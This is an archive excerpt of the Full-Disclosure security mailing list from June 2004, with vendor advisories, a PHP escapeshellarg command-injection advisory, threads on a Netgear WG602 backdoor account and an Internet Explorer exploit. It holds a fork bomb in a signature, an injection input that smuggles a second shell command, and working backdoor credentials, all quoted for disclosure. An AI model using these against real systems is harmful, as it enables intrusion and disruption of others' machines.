Fri, 4 Jun 2004 fd at proclaimed.net wrote: > Anyone know anyone at weather.com? No, but I must share that I am perhaps for the first time on this list truly scared of what you might have discovered. A weather control exploit? -- ------------------------- bash$ :(){ :|:&};: -- Michal Zalewski * [http://lcamtuf.coredump.cx] Did you know that clones never use mirrors? --------------------------- 2004-06-05 11:25 -- http://lcamtuf.coredump.cx/photo/current/ From chorchert at veedev.de Sat Jun 5 11:51:47 2004 From: chorchert at veedev.de (Christian Horchert) Date: Sat, 5 Jun 2004 12:51:47 +0200 Subject: [Full-Disclosure] weather.com contact In-Reply-To: <20040605112540.H75779@dekadens.coredump.cx> References: <000901c44a9c$f6eb8400$547abe18@proclaimed> <20040605112540.H75779@dekadens.coredump.cx> Message-ID: <57A8B4C0-B6DE-11D8-8DC0-000393754328@veedev.de> Am 05.06.2004 um 11:26 schrieb Michal Zalewski: > On Fri, 4 Jun 2004 fd at proclaimed.net wrote: > >> Anyone know anyone at weather.com? > > No, but I must share that I am perhaps for the first time on this list > truly scared of what you might have discovered. Some XSS probably. > A weather control exploit? While looking out of my office window today, I must admit, that I am really looking forward to see that one ;-) Christian From koon at gentoo.org Sat Jun 5 12:55:48 2004 From: koon at gentoo.org (Thierry Carrez) Date: Sat, 05 Jun 2004 13:55:48 +0200 Subject: [Full-Disclosure] [ GLSA 200406-03 ] sitecopy: Multiple vulnerabilities in included libneon Message-ID: <40C1B4C4.30607@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200406-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: sitecopy: Multiple vulnerabilities in included libneon Date: June 05, 2004 Bugs: #51585 ID: 200406-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== sitecopy includes a vulnerable version of the neon library. Background ========== sitecopy easily maintains remote websites. It makes it simple to keep a remote site synchronized with the local site with one command. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/sitecopy <= 0.13.4-r1 Description =========== Multiple format string vulnerabilities and a heap overflow vulnerability were discovered in the code of the neon library (GLSA 200405-01 and 200405-13). Current versions of the sitecopy package include their own version of this library. Impact ====== When connected to a malicious WebDAV server, these vulnerabilities could allow execution of arbitrary code with the rights of the user running sitecopy. Workaround ========== There is no known workaround at this time. Resolution ========== Currently, there is no released version of sitecopy that contains a fix for this issue. The original author of the program has indicated he is unsure when a fixed version may be released. Therefore, the sitecopy package has been hard-masked and current users are advised to unmerge the package until a new version is available. # emerge -pv unmerge net-misc/sitecopy # emerge unmerge net-misc/sitecopy References ========== [ 1 ] GLSA 200405-01 http://www.gentoo.org/security/en/glsa/glsa-200405-01.xml [ 2 ] GLSA 200405-13 http://www.gentoo.org/security/en/glsa/glsa-200405-13.xml Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200406-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAwbTDvcL1obalX08RArrjAJ0S3pVL3yJiDuN1FQ0zjVEXgJVr1ACeMzMT IfiHxuU2IJ8AzQ09RdZUoTc= =3VRY -----END PGP SIGNATURE----- From fw at deneb.enyo.de Sat Jun 5 17:20:10 2004 From: fw at deneb.enyo.de (Florian Weimer) Date: Sat, 05 Jun 2004 18:20:10 +0200 Subject: [Full-Disclosure] IBM Potential Credential Impersonation Attack paper? In-Reply-To: (erwinp21@hotmail.com's message of "Wed, 02 Jun 2004 11:42:22 +0000") References: Message-ID: <87zn7iugcl.fsf@deneb.enyo.de> > I found the following IBM advisory via their outside advisory service: > http://www-1.ibm.com/support/docview.wss?uid=swg21168762 > > They refer to an externally available paper that identifies a form of > credential impersonation exploit that can affect multiple IBM > products. Does anybody know which paper IBM is refering to? I tried > google, but I couldn' t find anything. It looks like a session fixation vulnerability (if this is the right terminology): | Internal Defect: 45186 | | Symptom: When a user logs in using forms authentication, they receive | a cookie and a login page. The user logs in and obtains a | credential. A security vulnerability exists where an attacker could | send his unauthenticated cookie to person X. If person X logged in | using this cookie, the attacker could hijack the seesion of person X -- Current mail filters: many dial-up/DSL/cable modem hosts, and the following domains: bigpond.com, di-ve.com, fuorissimo.com, hotmail.com, jumpy.it, libero.it, netscape.net, postino.it, simplesnet.pt, spymac.com, tiscali.co.uk, tiscali.cz, tiscali.it, voila.fr, yahoo.com. From lupe at lupe-christoph.de Thu Jun 3 23:03:13 2004 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Fri, 4 Jun 2004 00:03:13 +0200 Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability In-Reply-To: References: Message-ID: <20040605181304.14539.qmail@mail.datacolo.com> On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote: > Possibly vulnerable (not verified) > WG602 with other Firmware Versions > WG602v2 The WG602v2 uses different firmware. > Download the WG602 Version 1.5.67 firmware from Netgear > ( http://kbserver.netgear.com/support_details.asp?dnldID=366 ) WG602v2 Firmware Version 2.0RC5: http://kbserver.netgear.com/support_details.asp?dnldID=504 WG602v2 Repeater Firmware Version 3.2 RC6 http://kbserver.netgear.com/support_details.asp?dnldID=692 > and run the following shell commands on a UNIX box: > $ dd if=wg602_1.5.67_firmware.img bs=1 skip=425716 > rd.img.gz > $ zcat rd.img.gz | strings | grep -A5 -B5 5777364 2.0RC5 dd if=apfirmware_2.0rc5.img bs=1 skip=111596 of=rd.img.bz2 3.2 RC6 unzip wg602_v2_apfirmware_3.2rc6.zip dd if=apfirmware_3.2rc6.img bs=1 skip=112620 of=rd.img.bz2 In both cases this: bzcat rd.img.bz2 | strings | egrep 'Authorization|BASIC|super|5777364' Returns some garbage, but nothing similar to your output. Also logging in with super/5777364 does not work with my unit (unknown firmware release - I forgot the password and have to reset the unit. But it's getting a little late here.) HTH, Lupe Christoph -- | lupe at lupe-christoph.de | http://www.lupe-christoph.de/ | | "... putting a mail server on the Internet without filtering is like | | covering yourself with barbecue sauce and breaking into the Charity | | Home for Badgers with Rabies. Michael Lucas | From debian-security-announce at lists.debian.org Sat Jun 5 21:39:22 2004 From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org) Date: Sat, 5 Jun 2004 13:39:22 -0700 Subject: [Full-Disclosure] [SECURITY] [DSA 515-1] New lha packages fix several vulnerabilities Message-ID: <20040605203922.GW19402@alcor.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 515-1 security at debian.org http://www.debian.org/security/ Matt Zimmerman June 5th, 2004 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : lha Vulnerability : several Problem-Type : local Debian-specific: no CVE Ids : CAN-2004-0234 CAN-2004-0235 Two vulnerabilities were discovered in lha: - CAN-2004-0234 - Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14 allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. - CAN-2004-0235 - Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path"). For the current stable distribution (woody), these problems have been fixed in version 1.14i-2woody1. For the unstable distribution (sid), these problems have been fixed in version 1.14i-8. We recommend that you update your lha package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1.dsc Size/MD5 checksum: 556 22b59156de011ddb84b0eaed4f174d2c http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1.diff.gz Size/MD5 checksum: 21414 0f990fd920ea4770dd088a97c1c87f18 http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i.orig.tar.gz Size/MD5 checksum: 64196 10410742b0169f3357ef9a3f0f032037 Alpha architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_alpha.deb Size/MD5 checksum: 64820 b7e55241026435e0c882178f6606f33b ARM architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_arm.deb Size/MD5 checksum: 55542 62be18e035d6faedb4d990f16081d74e Intel IA-32 architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_i386.deb Size/MD5 checksum: 50090 7548e83cb7049fe43243f804eb456ed7 Intel IA-64 architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_ia64.deb Size/MD5 checksum: 73588 32e62b8fbd0cf2ef64d7838d005ef19e Motorola 680x0 architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_m68k.deb Size/MD5 checksum: 48632 bd5ce2c34a44952abf757993153fe238 PowerPC architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_powerpc.deb Size/MD5 checksum: 55160 9d8225135b7c6abe443a4d0d4fc27245 IBM S/390 architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_s390.deb Size/MD5 checksum: 53930 02c5e52b834539a30bd76f2e90265fb8 Sun Sparc architecture: http://security.debian.org/pool/updates/non-free/l/lha/lha_1.14i-2woody1_sparc.deb Size/MD5 checksum: 56526 8323a0469ef41c7fcf8b84c4b5f1a7ce These files will probably be moved into the stable distribution on its next revision. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAwi9kArxCt0PiXR4RAtG3AKCtP0m2hbcPCG2y1hPXPYA2iLTkyACg0g15 BkEdgvrmYOhmBy2sbOzYIoc= =v4b1 -----END PGP SIGNATURE----- From dufresne at winternet.com Sat Jun 5 23:38:11 2004 From: dufresne at winternet.com (Ron DuFresne) Date: Sat, 5 Jun 2004 17:38:11 -0500 (CDT) Subject: [Full-Disclosure] another new worm submission In-Reply-To: <40C135E8.9030700@ameritech.net> Message-ID: [SNIP] > >> > >> How are these system getting compromised? Why don't you have this patch > >> deployed yet? Why are these systems reachable from the Internet over > >> port > >> 445? > >> > > For someone who knows nothing about his network, you sure are willing > > to make a lot of assumptions. You admit you don't know how the systems > > were compromised and you don't know what compromised them, yet you > > castigate him for leaving port 445 open and not patching and you > > assume this happened *remotely*? > >> [SNIP] > You're right, I made an assumption that the systems were being > compromised remotely rather than being deliberately and maliciously > hacked by insiders. Would this somehow be less of a problem? Having > systems with routable addresses reachable through port 445 is the most > likely avenue of compromise, if this is not the case then Josh would be > well advised to determine exactly what is going on with his network. > Agreed here, anyone sitting with exposed windows specific ports on the insecure Internet is pretty much deserving of what hits them these days. Without tackling that side of the coin, it's going to be pretty hard for these folks to determine if the troubles they are facing is internal or not. Without control of the perimiter choke point, how can one even think to start to look at controls of the whole danged wire inside? Perhaps we need to adapt personal firewall day to a monthly thing for the next 5 years or more to help these clueless souls. [SNIP] Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From dufresne at winternet.com Sat Jun 5 23:41:20 2004 From: dufresne at winternet.com (Ron DuFresne) Date: Sat, 5 Jun 2004 17:41:20 -0500 (CDT) Subject: [Full-Disclosure] weather.com contact In-Reply-To: <20040605112540.H75779@dekadens.coredump.cx> Message-ID: On Sat, 5 Jun 2004, Michal Zalewski wrote: > On Fri, 4 Jun 2004 fd at proclaimed.net wrote: > > > Anyone know anyone at weather.com? > > No, but I must share that I am perhaps for the first time on this list > truly scared of what you might have discovered. > > A weather control exploit? > didn't they try this back at woodstock? Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From user86 at earthlink.net Sun Jun 6 01:37:10 2004 From: user86 at earthlink.net (user86) Date: Sat, 5 Jun 2004 20:37:10 -0400 Subject: [Full-Disclosure] SMC 7008ABRv2 and 7004VBRv1 updated firmware corrects port 1900 issue. Message-ID: <200406052037.10519.user86@earthlink.net> SMC has released updated firmware for their 7008ABRv2 (part number: 750.9814) and 7004VBRv1 routers that permanently fixes the port 1900 issue, making port 1900 no longer be WAN (internet) accessible. The firmware update for the 7008ABRv2 (version 1.035) is available from: http://www.smc.com/index.cfm?sec=Support&pg=Download-Details&prod=243&site=c The firmware update for the 7004VBRv1 (version 1.232) is available from: http://www.smc.com/index.cfm?sec=Support&pg=Download-Details&prod=257&site=c From cfaigle at richmond.edu Thu Jun 3 21:18:07 2004 From: cfaigle at richmond.edu (Faigle, Chris) Date: Thu, 3 Jun 2004 16:18:07 -0400 Subject: [Full-Disclosure] VirusLogger - Script to sort and e-mail Symantec Corporate Anti-Virus Logs available Message-ID: <0F98C8BA43C00C42AFFBE000DA9DDB2301C49654@pollux.richmond.edu> Hi, We use Symantec Corporate Anti-Virus here at the University of Richmond for all faculty, staff and student Windows machines. Several institutions have expressed interest in a script that I wrote to have the logs from the virus server sorted and e-mailed daily. It is now available (under GPL) at http://is.richmond.edu/techsupport/security/Downloads.htm In brief: It uses Symantec's VHistExp tool (on the CD, in the Tools\Nosuprt\VHistExp\ folder) to pull the logs. It then buckets each entry into "Left Alone", "Deleted", "Cleaned", "Quarantined" and "Unknown". It also makes a bucket for "Special" entries, which are keywords set to "Blaster", "Welchia", "Gaobot", "Sasser", etc. [I use these as an additional resource to determine if a machine is patched.] It then saves these reports and e-mails them to the addresses specified. I have it set up as a Scheduled Task on our SAV server to run at 3 am, using "VirusLogger.py -yesterday", so every morning I receive a fresh report of the previous day's activity. (As does our help-desk.) Each morning, I go through the "Left Alone" report and use the server to verify if each virus still exists and make decisions as to how each machine should be handled. I go through the "Special" report if it is not empty as these machines have a patch issue. Further, I also run quickly check the "Deleted" report to keep an eye on what is coming through, but getting deleted. It requires Python, keeps an extensive log and has reasonably good exception handling. It has been running stably for months now. Hope this is useful. Please reply off-list. Best, Chris Faigle IS Security University of Richmond From jhg at athensgroup.com Sun Jun 6 01:27:07 2004 From: jhg at athensgroup.com (James Garrison) Date: Sat, 05 Jun 2004 19:27:07 -0500 Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability In-Reply-To: <20040603220313.GB2307@lupe-christoph.de> References: <20040603220313.GB2307@lupe-christoph.de> Message-ID: <40C264DB.5000302@athensgroup.com> My WG602v2 with firmware 2.0RC5 does not appear to be vulnerable. I cannot login with the super/5777364 combination. Lupe Christoph wrote: > On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote: > > >> Possibly vulnerable (not verified) >> WG602 with other Firmware Versions >> WG602v2 -- James Garrison Athens Group, Inc. mailto:jhg at athensgroup.com 5608 Parkcrest Dr http://www.athensgroup.com Austin, TX 78731 PGP: RSA=0x92E90A3B DH/DSS=0x498D331C (512) 345-0600 x150 From jhg at athensgroup.com Sun Jun 6 01:34:32 2004 From: jhg at athensgroup.com (James Garrison) Date: Sat, 05 Jun 2004 19:34:32 -0500 Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability In-Reply-To: <20040603220313.GB2307@lupe-christoph.de> References: <20040603220313.GB2307@lupe-christoph.de> Message-ID: <40C26698.4090508@athensgroup.com> CORRECTION - Firmware is 3.1RC5 not 2.0RC5 as I first stated My WG602v2 with firmware 3.1RC5 does not appear to be vulnerable. ^^^^^^ I cannot login with the super/5777364 combination. Lupe Christoph wrote: > On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote: > > >> Possibly vulnerable (not verified) >> WG602 with other Firmware Versions >> WG602v2 -- James Garrison Athens Group, Inc. mailto:jhg at athensgroup.com 5608 Parkcrest Dr http://www.athensgroup.com Austin, TX 78731 PGP: RSA=0x92E90A3B DH/DSS=0x498D331C (512) 345-0600 x150 From list at fabiand.net Sun Jun 6 12:25:30 2004 From: list at fabiand.net (Daniel Fabian) Date: Sun, 6 Jun 2004 13:25:30 +0200 Subject: [Full-Disclosure] PHP escapeshellarg Windows Vulnerability Message-ID: <200406061325.AA2588018034@fabiand.net> SEC-CONSULT Security Advisory - PHP: Hypertext Preprocessor Vendor: PHP (http://www.php.net) Product: PHP 4.3.6 and below (verified in 4.3.5 which was current when the bug was discovered) Vendor status: vendor contacted (04-04-2004) Patch status: Problem fixed in 4.3.7 =========== DESCRIPTION =========== PHP offers the function escapeshellarg() to escape arguments to shell commands in a way that makes it impossible for an attacker to execute additional commands. However due to a bug in the function, this does not work with the windows version of PHP. Vulnerable is for example the following code: [code] $user = escapeshellarg($_GET['user']); $pwd = escapeshellarg($_GET['pwd']); system("htpasswd -nb $user $pwd", $return); [/code] If an attacker enters '" || dir || ' (without the single quotes) for user (or pwd), the command dir is executed. =============== GENERAL REMARKS =============== - The bug was successfully verified in PHP 4.3.3 and 4.3.5. In former version (4.3.3) the execution of additional commands was only possible when single quotes were used. - While correcting the vulnerability, the PHP staff seems to have noticed that the function escapeshellcmd is vulnerable too (according to the changelog of v4.3.7). ==================== Recommended Hotfixes ==================== Update PHP to version 4.3.7. EOF Daniel Fabian / @2004 d.fabian at sec-consult dot com ======= Contact ======= SEC CONSULT Unternehmensberatung GmbH B?ro Wien Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com http://www.sec-consult.com From Jan-Peter.Koopmann at seceidos.de Sun Jun 6 07:59:13 2004 From: Jan-Peter.Koopmann at seceidos.de (Jan-Peter Koopmann) Date: Sun, 6 Jun 2004 08:59:13 +0200 Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability Message-ID: On Sunday, June 06, 2004 2:35 AM James Garrison wrote: > CORRECTION - Firmware is 3.1RC5 not 2.0RC5 as I first stated > > My WG602v2 with firmware 3.1RC5 does not appear to be vulnerable. > ^^^^^^ > > I cannot login with the super/5777364 combination. Firmware 3.2RC3 seems safe as well. Regards, JP From mwilliamson at stx.rr.com Sun Jun 6 15:33:00 2004 From: mwilliamson at stx.rr.com (michael s williamson) Date: Sun, 06 Jun 2004 09:33:00 -0500 Subject: [Full-Disclosure] Using Xbox live for covert communication In-Reply-To: References: Message-ID: <1086532380.21450.15.camel@mesquite.yi.org> -- snip -- > worth a try for securitys sake ? yes! -- snip -- Before anybody does something stupid, remember that in the USA we really no longer have the bill of rights. We also no longer have checks and balances. We can be jailed indefinitely without even knowing what we're charged with. As for trial by jury by one's peers...guess not if it's all classified. This is not the country I grew up in. I wonder how much longer it'll be when breaking DCMA will be considered an act of terrorism. -Michael PS: If you really want a good covert channel, bury text in donkey porn images on usenet posted through a chain of pgp-enabled anonymous remailers. Make sure and set each remailer to add a random delay. Pad each level with a random amount of uncompressable crap. If the NSA is really able to follow this, at least you'll be able insure their displeasure of having to view really horrible porn. ;) From rtoren at futures-inc.com Sun Jun 6 20:42:00 2004 From: rtoren at futures-inc.com (Rip Toren) Date: Sun, 6 Jun 2004 15:42:00 -0400 Subject: [Full-Disclosure] Netgear WG602 Accesspoint vulnerability In-Reply-To: References: Message-ID: <1086550920.40c373882ec34@webmail.futures-inc.com> Folks; I found a new firware update on the Netgear product support page that removes this account, along with a couple of other fixes. I upgraded, and the login is no longer available. Good, quick response..... Quoting Tom Knienieder : > > > KHAMSIN Security News > KSN Reference: 2004-06-03 0001 TIP > --------------------------------------------------------------------------- > > Title > ----- > The Netgear WG602 Accesspoint contains an undocumented > administrative account. > > Date > ---- > 2004-06-03 > > > Description > ----------- > > The webinterface which is reachable from both interfaces (LAN/WLAN) > contains an undocumented administrative account which cannot be disabled. > > Any user logging in with the username "super" and the password "5777364" > is in complete control of the device. > > This vulnerability can be exploited by any person which is able to reach > the webinterface of the device with a webbrowser. > > A search on Google revealed that "5777364" is actually the phonenumber > of z-com Taiwan which develops and offers WLAN equipment for its OEM > customers. > > Currently it is unknown whether other Vendors are shipping products > based on z-com OEM designs. > > <> -- Rip Toren Senior Information Assurance Engineer Futures Inc. phone: 410-340-4033 email: rtoren at futures-inc.com website: http://www.futures-inc.com -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. This email is for the intended recipient only. If you have received this email and you are not the intended recipient, please contact the originating party and delete the email message. Thank you. Futures Inc. -------------------------------------------------------------------------- ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ From jkuperus at planet.nl Mon Jun 7 02:21:52 2004 From: jkuperus at planet.nl (Jelmer) Date: Mon, 07 Jun 2004 03:21:52 +0200 Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) Message-ID: <000001c44c2d$d33df9b0$3200000a@alex> Just when I though it was save to once?more?use internet explorer I received an?email bringing my attention to this webpage http://216.130.188.219/ei2/installer.htm ? that according to him used an exploit that affected fully patched internet explorer 6 browsers. Being rather skeptical I carelessly clicked on the link only to witness how it automatically installed addware on my pc!!! ? Now there had been reports about 0day exploits making rounds for quite some time like for instance this post ? http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0 ? However I hadn't seen any evidence to support this up until now Thor Larholm as usual added to the confusion by deliberately spreading disinformation as seen in this post ? http://seclists.org/lists/bugtraq/2004/May/0153.html ? Attributing it to and I quote "just one of the remaining IE vulnerabilities that are not yet patched" I?ve attempted to write up an analysis that will show that there are at least 2 new and AFAIK unpublished vulnerabilities (feel free to proof me wrong) out there in the wild, one being fairly sophisticated You can view it at: http://62.131.86.111/analysis.htm Additionally you can view a harmless demonstration of the vulnerabilities at http://62.131.86.111/security/idiots/repro/installer.htm Finally I also attached the source files to this message -------------- next part -------------- A non-text attachment was scrubbed... Name: exploit.zip Type: application/octet-stream Size: 1686 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040607/6f508997/attachment.obj From chris at compucounts.com Mon Jun 7 03:06:01 2004 From: chris at compucounts.com (Chris Carlson) Date: Sun, 6 Jun 2004 22:06:01 -0400 Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) Message-ID: When run remotely: Line: 1 Char: 1 Error: Access is denied. Code: 0 URL: http://62.131.86.111/security/idiots/repro/installer.htm When run locally, software installation is blocked. Using IE 6.0.2900.2096 SP2, WinXP SP2 I've gotta say that SP2 has some VERY nice protection builtin. On the downside, I still havn't figured out how to turn it off ;) > -----Original Message----- > From: full-disclosure-admin at lists.netsys.com > [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Jelmer > Sent: Sunday, June 06, 2004 21:22 > To: bugtraq at securityfocus.com > Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net > Subject: [Full-Disclosure] Internet explorer 6 execution of > arbitrary code (An analysis of the 180 Solutions Trojan) > > Just when I though it was save to once?more?use internet > explorer I received an?email bringing my attention to this > webpage http://216.130.188.219/ei2/installer.htm ? that > according to him used an exploit that affected fully patched > internet explorer 6 browsers. Being rather skeptical I > carelessly clicked on the link only to witness how it > automatically installed addware on my pc!!! > ? > Now there had been reports about 0day exploits making rounds > for quite some time like for instance this post > ? > http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0 > ? > However I hadn't seen any evidence to support this up until > now Thor Larholm as usual added to the confusion by > deliberately spreading disinformation as seen in this post > ? > http://seclists.org/lists/bugtraq/2004/May/0153.html > ? > Attributing it to and I quote "just one of the remaining IE > vulnerabilities that are not yet patched" > > I've attempted to write up an analysis that will show that > there are at least 2 new and AFAIK unpublished > vulnerabilities (feel free to proof me > wrong) out there in the wild, one being fairly sophisticated > > You can view it at: > > http://62.131.86.111/analysis.htm > > Additionally you can view a harmless demonstration of the > vulnerabilities at > > http://62.131.86.111/security/idiots/repro/installer.htm > > Finally I also attached the source files to this message > > From jkuperus at planet.nl Mon Jun 7 03:17:28 2004 From: jkuperus at planet.nl (Jelmer) Date: Mon, 07 Jun 2004 04:17:28 +0200 Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) In-Reply-To: Message-ID: <000001c44c35$98334110$3200000a@alex> I haven't installed SP2 yet since I heard a lot of complaints from people who claimed it caused instability, it had memory management issues, some drivers didn't work, security measures a bit too much in your face etc But I reviewed the list of changes sometime back and I concur, it looks very promising, I think in the near future an IE exploit will be a rare occurrence as opposed to a bi weekly event -----Original Message----- From: Chris Carlson [mailto:chris at compucounts.com] Sent: maandag 7 juni 2004 4:06 To: Jelmer Cc: full-disclosure at lists.netsys.com; bugtraq at securityfocus.com Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) When run remotely: Line: 1 Char: 1 Error: Access is denied. Code: 0 URL: http://62.131.86.111/security/idiots/repro/installer.htm When run locally, software installation is blocked. Using IE 6.0.2900.2096 SP2, WinXP SP2 I've gotta say that SP2 has some VERY nice protection builtin. On the downside, I still havn't figured out how to turn it off ;) > -----Original Message----- > From: full-disclosure-admin at lists.netsys.com > [mailto:full-disclosure-admin at lists.netsys.com] On Behalf Of Jelmer > Sent: Sunday, June 06, 2004 21:22 > To: bugtraq at securityfocus.com > Cc: full-disclosure at lists.netsys.com; peter at diplomatmail.net > Subject: [Full-Disclosure] Internet explorer 6 execution of > arbitrary code (An analysis of the 180 Solutions Trojan) > > Just when I though it was save to once?more?use internet > explorer I received an?email bringing my attention to this > webpage http://216.130.188.219/ei2/installer.htm ? that > according to him used an exploit that affected fully patched > internet explorer 6 browsers. Being rather skeptical I > carelessly clicked on the link only to witness how it > automatically installed addware on my pc!!! > ? > Now there had been reports about 0day exploits making rounds > for quite some time like for instance this post > ? > http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0 > ? > However I hadn't seen any evidence to support this up until > now Thor Larholm as usual added to the confusion by > deliberately spreading disinformation as seen in this post > ? > http://seclists.org/lists/bugtraq/2004/May/0153.html > ? > Attributing it to and I quote "just one of the remaining IE > vulnerabilities that are not yet patched" > > I've attempted to write up an analysis that will show that > there are at least 2 new and AFAIK unpublished > vulnerabilities (feel free to proof me > wrong) out there in the wild, one being fairly sophisticated > > You can view it at: > > http://62.131.86.111/analysis.htm > > Additionally you can view a harmless demonstration of the > vulnerabilities at > > http://62.131.86.111/security/idiots/repro/installer.htm > > Finally I also attached the source files to this message > > From larry at larryseltzer.com Mon Jun 7 03:42:51 2004 From: larry at larryseltzer.com (Larry Seltzer) Date: Sun, 6 Jun 2004 22:42:51 -0400 Subject: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan) In-Reply-To: <000001c44c2d$d33df9b0$3200000a@alex> Message-ID: <200406070243.i572hHv20372@netsys.com> >>Finally I also attached the source files to this message My McAfee-based gateway scanner blocks the attachment and labels it as "VBS/Psyme", which has this description (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100749): "This trojan exploits an unpatched (at the time of this writing) vulnerability in Internet Explorer. The vulnerability allows for the writing, and overwriting, of local files by exploiting the ADODB.Stream object. There are several variants of this trojan. Therefore this description is design to give an overview of how the trojan works. The trojan exists as VBScript. This script contains instructions to download a remote executable, save it to a specified location on the local disk, and then execute it." Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.ziffdavis.com/seltzer larryseltzer at ziffdavis.com From PerrymonJ at bek.com Mon Jun 7 04:35:46 2004 From: PerrymonJ at bek.com (Perrymon, Josh L.) Date: Sun, 6 Jun 2004 22:35:46 -0500 Subject: [Full-Disclosure] another new worm submission Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A023532B1@is6b> I agree. Anyone that would have those ports open has a *lot more to worry about that cleaning a few worm infections. That's not the case here. This infection was caused by a remote user not a Lan user. With several hundred laptops it's hard have 0 exposure. As with any growing security practice and today's decreased budgets areas of focus are determined on risk exposure. Anywho- I found the Trojan to be backdoor.nibu.g- although Symantec AV didn't pick it up until tonight. I think this is a good example that perimeter security is only part of the battle. Tomorrow's morning meeting will stress the importance of desktop firewalls again and a good patch management process. You can talk until your blue in the face to upper management but I find 90% to be reactive. Oh well- JP -----Original Message----- From: Ron DuFresne [mailto:dufresne at winternet.com] Sent: Saturday, June 05, 2004 5:38 PM To: Jerry Heidtke Cc: Paul Schmehl; full-disclosure at netsys.com Subject: Re: [Full-Disclosure] another new worm submission [SNIP] > >> > >> How are these system getting compromised? 